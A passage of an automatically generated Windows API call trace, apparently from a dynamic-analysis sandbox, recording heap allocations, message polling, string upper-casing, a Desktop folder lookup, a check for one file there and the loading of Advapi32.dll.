Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0087.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0087.394] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0087.394] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa61b0 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0087.394] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.394] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6728 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0087.394] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0087.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0087.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0087.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0087.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0087.395] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0087.395] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.395] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0087.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0087.395] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0087.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0087.395] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0087.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0087.395] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0087.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0087.395] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/6yMUE.flv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 0x9a4040 [0087.395] FindClose (in: hFindFile=0x9a4040 | out: hFindFile=0x9a4040) returned 1 [0087.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0087.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0087.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0087.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.396] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0087.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0087.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.397] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0087.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0087.397] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0087.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0087.397] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0087.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0087.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0087.397] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0087.398] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0087.398] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0087.398] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0087.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9808 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.398] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0087.398] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0087.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0087.399] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0087.399] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0087.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0087.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0087.400] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0087.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0087.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.400] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0087.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0087.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.401] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0087.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.401] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0087.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0087.401] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0087.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0087.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72098 [0087.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0087.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0087.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.401] 